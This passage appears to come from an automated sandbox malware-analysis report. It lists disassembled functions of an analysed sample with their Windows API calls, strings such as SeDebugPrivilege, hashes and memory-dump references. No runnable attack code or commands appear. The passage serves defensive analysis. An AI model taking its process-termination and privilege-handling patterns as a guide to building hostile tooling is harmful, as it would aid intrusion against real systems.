                                          • SysFreeString.OLEAUT32(?), ref: 001295EA
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                          • String ID:
                                          • API String ID: 560350794-0
                                          • Opcode ID: 83e2f3390e8ae2d7c7d820885746c38b2f023f949bc86152a25b6c724f455555
                                          • Instruction ID: 864b703a2bcb0549948a5ea6d72e5cf44022a231eb66c05577856885bbbc905f
                                          • Opcode Fuzzy Hash: 83e2f3390e8ae2d7c7d820885746c38b2f023f949bc86152a25b6c724f455555
                                          • Instruction Fuzzy Hash: 27F12B75A00219EFCB14DFA8D884EAEB7B9FF49314F108059F906AB261DB31AE55CB50
                                          Function 0012FD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0012FD9E
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0012FF31
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0012FF55
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0012FF95
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0012FFB7
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00130133
                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00130165
                                          • CloseHandle.KERNEL32(?), ref: 00130194
                                          • CloseHandle.KERNEL32(?), ref: 0013020B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                          • String ID:
                                          • API String ID: 4090791747-0
                                          • Opcode ID: c021a65225c2f0f650d5c95154ef9d0cfe176a2773f849469d34e5b06a071349
                                          • Instruction ID: 6b1b81bd26286c8b8406ef5b07e3cc9f7a44bd6e6072fa3994280c45a425b3c2
                                          • Opcode Fuzzy Hash: c021a65225c2f0f650d5c95154ef9d0cfe176a2773f849469d34e5b06a071349
                                          • Instruction Fuzzy Hash: 78E19D31204341DFC719EF24D891BAABBE1BF89310F15896DF9899B2A2DB31DD41CB52
                                          Function 0011527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00114BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00113B8A,?), ref: 00114BE0
                                            • Part of subcall function 00114BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00113B8A,?), ref: 00114BF9
                                            • Part of subcall function 00114FEC: GetFileAttributesW.KERNEL32(?,00113BFE), ref: 00114FED
                                          • lstrcmpiW.KERNEL32(?,?), ref: 001152FB
                                          • _wcscmp.LIBCMT ref: 00115315
                                          • MoveFileW.KERNEL32(?,?), ref: 00115330
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                          • String ID:
                                          • API String ID: 793581249-0
                                          • Opcode ID: 1c6e7a51e5af9cf94b5a82ea4760e2aa3d924e2bb6502d5a52ca7bbbe8b8fada
                                          • Instruction ID: ebd97f61c5d3206fc4c22d09dc857c3d746f64e71e40f0170b971eea5c71651f
                                          • Opcode Fuzzy Hash: 1c6e7a51e5af9cf94b5a82ea4760e2aa3d924e2bb6502d5a52ca7bbbe8b8fada
                                          • Instruction Fuzzy Hash: 105184B20087859BC728DBA4D881DDFB7ECAF95310F50092EF189D3152EF74A6C98766
                                          Function 00138C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00138D24
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: 92d940dd1969b436e087f22ded5d85f3e1a4f48da7d1db9262e14a20fe99f2e8
                                          • Instruction ID: fc159520a88566e720344e82d24703b88c4d74acfdd0b8a35fbbc985a0753e86
                                          • Opcode Fuzzy Hash: 92d940dd1969b436e087f22ded5d85f3e1a4f48da7d1db9262e14a20fe99f2e8
                                          • Instruction Fuzzy Hash: DD51AD30641304BFEF249F68CC89BE97BA4AB15360F244525FA15EB5E2CF71AD90CB61
                                          Function 000B2F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 000EC638
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000EC65A
                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000EC672
                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 000EC690
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000EC6B1
                                          • DestroyIcon.USER32(00000000), ref: 000EC6C0
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000EC6DD
                                          • DestroyIcon.USER32(?), ref: 000EC6EC
                                            • Part of subcall function 0013AAD4: DeleteObject.GDI32(00000000), ref: 0013AB0D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                          • String ID:
                                          • API String ID: 2819616528-0
                                          • Opcode ID: d6f65b20cc727ab2f89c92a82d23cc40362dcd98cb5e3f8daebb66ddd49683ad
                                          • Instruction ID: 0d8d1d5b4112d2d430dd5e93cb48381a4825e6ce6d5149a0d33977f5535e1d4b
                                          • Opcode Fuzzy Hash: d6f65b20cc727ab2f89c92a82d23cc40362dcd98cb5e3f8daebb66ddd49683ad
                                          • Instruction Fuzzy Hash: EF51A770A0020AAFEB20DF25DC45FBA7BF5EB48710F100528F946A76A0DB71ED91DB60
                                          Function 0010A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0010B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0010B54D
                                            • Part of subcall function 0010B52D: GetCurrentThreadId.KERNEL32 ref: 0010B554
                                            • Part of subcall function 0010B52D: AttachThreadInput.USER32(00000000,?,0010A23B,?,00000001), ref: 0010B55B
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0010A246
                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0010A263
                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0010A266
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0010A26F
                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0010A28D
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0010A290
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0010A299
                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0010A2B0
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0010A2B3
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                          • String ID:
                                          • API String ID: 2014098862-0
                                          • Opcode ID: dd45f54e5bf9242e822fa8529b3f779d4c77a6a412d32a3edeb0f0927ad369ea
                                          • Instruction ID: 521352af250dbefbcf2df42a7c57bb1f51d8cc4346d37ccbf73920482879e9c4
                                          • Opcode Fuzzy Hash: dd45f54e5bf9242e822fa8529b3f779d4c77a6a412d32a3edeb0f0927ad369ea
                                          • Instruction Fuzzy Hash: 0F1104B5950218BFF6116F619C8AF6A3F2DEF4D750F510429F3406B0E0CAF35C909AA0
                                          Function 001094D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0010915A,00000B00,?,?), ref: 001094E2
                                          • HeapAlloc.KERNEL32(00000000,?,0010915A,00000B00,?,?), ref: 001094E9
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0010915A,00000B00,?,?), ref: 001094FE
                                          • GetCurrentProcess.KERNEL32(?,00000000,?,0010915A,00000B00,?,?), ref: 00109506
                                          • DuplicateHandle.KERNEL32(00000000,?,0010915A,00000B00,?,?), ref: 00109509
                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0010915A,00000B00,?,?), ref: 00109519
                                          • GetCurrentProcess.KERNEL32(0010915A,00000000,?,0010915A,00000B00,?,?), ref: 00109521
                                          • DuplicateHandle.KERNEL32(00000000,?,0010915A,00000B00,?,?), ref: 00109524
                                          • CreateThread.KERNEL32(00000000,00000000,0010954A,00000000,00000000,00000000), ref: 0010953E
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                          • String ID:
                                          • API String ID: 1957940570-0
                                          • Opcode ID: 8c600e49440cf1a498d3fe9c9a2f20e49f82fce051e81187f579b09cf9bcd05f
                                          • Instruction ID: 1e6bf85a4d632384b0c0cbaa3e8c0037541c7e85a3e0cdc9d7a4a70dc2cd94de
                                          • Opcode Fuzzy Hash: 8c600e49440cf1a498d3fe9c9a2f20e49f82fce051e81187f579b09cf9bcd05f
                                          • Instruction Fuzzy Hash: F501BBB9240304BFE711ABA6DC4DF6B7BACEB89B11F004411FB05DB5A1CA71D840CB20
                                          Function 0012A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NULL Pointer assignment$Not an Object type
                                          • API String ID: 0-572801152
                                          • Opcode ID: 250f1c1c043b7f22363efb7d4f09d1c10e23aa0ce3fbb33091f6dc242e641da4
                                          • Instruction ID: 343a2b2bf3f2ff94ef4b59a32ea4f8293d2a4e375ef0e8c95bdc8c9ffaef1815
                                          • Opcode Fuzzy Hash: 250f1c1c043b7f22363efb7d4f09d1c10e23aa0ce3fbb33091f6dc242e641da4
                                          • Instruction Fuzzy Hash: 06C1A371A0022A9FDF14DF98E884AAEB7F5FF48310F548469E905EB281E770ED54CB91
                                          Function 001297FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$_memset
                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                          • API String ID: 2862541840-625585964
                                          • Opcode ID: ad2d4337395338dce58737bd858b717f163692ff35d86a951b031f2bcf47618e
                                          • Instruction ID: 2311c6dac61ab0e54ae6f4dd45d30c32e2f5f7bc61085aecec65dad1093fc125
                                          • Opcode Fuzzy Hash: ad2d4337395338dce58737bd858b717f163692ff35d86a951b031f2bcf47618e
                                          • Instruction Fuzzy Hash: A5919E70A00329ABDF24CFA9D884FEEBBB8EF45714F10855DF515AB251D7709950CBA0
                                          Function 001373A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00137449
                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 0013745D
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00137477
                                          • _wcscat.LIBCMT ref: 001374D2
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 001374E9
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00137517
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcscat
                                          • String ID: SysListView32
                                          • API String ID: 307300125-78025650
                                          • Opcode ID: 09dd9e5b108ae245c0a7a1b82828a900f0d85b75b451735dfc538af0ae98cbd9
                                          • Instruction ID: 172df96b062475fa945900553a7e7d3e9cf76425f73426f293ff0775901245fa
                                          • Opcode Fuzzy Hash: 09dd9e5b108ae245c0a7a1b82828a900f0d85b75b451735dfc538af0ae98cbd9
                                          • Instruction Fuzzy Hash: E14184B1904348AFEB219F64CC85BEE77A8EF48350F10442AFA89A71D1D7719D94CB60
                                          Function 0012F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00114148: CreateToolhelp32Snapshot.KERNEL32 ref: 0011416D
                                            • Part of subcall function 00114148: Process32FirstW.KERNEL32(00000000,?), ref: 0011417B
                                            • Part of subcall function 00114148: CloseHandle.KERNEL32(00000000), ref: 00114245
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0012F08D
                                          • GetLastError.KERNEL32 ref: 0012F0A0
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0012F0CF
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0012F14C
                                          • GetLastError.KERNEL32(00000000), ref: 0012F157
                                          • CloseHandle.KERNEL32(00000000), ref: 0012F18C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          • Opcode ID: 72dbb962195dffbe33b206fd7ab2505fa34c3ca861daa9e12083346af08d548e
                                          • Instruction ID: 093974f8e42e6cd5b5836810cb1aca9cee8760c4a4798af401d6df9fffbbe427
                                          • Opcode Fuzzy Hash: 72dbb962195dffbe33b206fd7ab2505fa34c3ca861daa9e12083346af08d548e
                                          • Instruction Fuzzy Hash: 9041CD302002019FD715EF24DCA5FADB7A2AF94714F04842CF9428B2D3CBB0A965CB86
                                          Function 001134DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadIconW.USER32(00000000,00007F03), ref: 0011357C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: 65b025212073cf8be1707e29ae6b6539c018a30854b5f8e2034680d1705f0f40
                                          • Instruction ID: 90cae44403f3af907fbc653a2fdc27d9f37505b8c0e808d55a7dc5114458dc98
                                          • Opcode Fuzzy Hash: 65b025212073cf8be1707e29ae6b6539c018a30854b5f8e2034680d1705f0f40
                                          • Instruction Fuzzy Hash: AE112B7960D307BEE7495A14EC82CEA779DDF06B60B10003AFA2096282E7746FC045B5
                                          Function 001147E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00114802
                                          • LoadStringW.USER32(00000000), ref: 00114809
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0011481F
                                          • LoadStringW.USER32(00000000), ref: 00114826
                                          • _wprintf.LIBCMT ref: 0011484C
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0011486A
                                          Strings
                                          • %s (%d) : ==> %s: %s %s, xrefs: 00114847
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wprintf
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 3648134473-3128320259
                                          • Opcode ID: d106c08c754a5070fc5ae30e425fb7b0f9a53af7534f4557ad69378e4d00d574
                                          • Instruction ID: dbd1b2e1ec89ad7b5f9b629a4d734a1d806d0d6dbe5a0759fa3baae2268beff9
                                          • Opcode Fuzzy Hash: d106c08c754a5070fc5ae30e425fb7b0f9a53af7534f4557ad69378e4d00d574
                                          • Instruction Fuzzy Hash: 6E018FF68002087FE712D7A19D89EF6737CEB08300F4001A5BB0AE2051EB309EC44B71
                                          Function 0013DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • GetSystemMetrics.USER32(0000000F), ref: 0013DB42
                                          • GetSystemMetrics.USER32(0000000F), ref: 0013DB62
                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0013DD9D
                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0013DDBB
                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0013DDDC
                                          • ShowWindow.USER32(00000003,00000000), ref: 0013DDFB
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0013DE20
                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0013DE43
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                          • String ID:
                                          • API String ID: 1211466189-0
                                          • Opcode ID: 96a748780ebb4a5f4294dc5d169c5de75d0d414b7a691b135d93f674ed78f435
                                          • Instruction ID: 1ee010bea24874fc33b6fb456fd806918660d892d5bf89144add9cd561ad0d48
                                          • Opcode Fuzzy Hash: 96a748780ebb4a5f4294dc5d169c5de75d0d414b7a691b135d93f674ed78f435
                                          • Instruction Fuzzy Hash: F5B1AA75600215EFDF18CF69E9857AD7BB1FF08701F098069ED48AF299D730A990CBA0
                                          Function 00130371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0013147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013044E
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharConnectRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3479070676-0
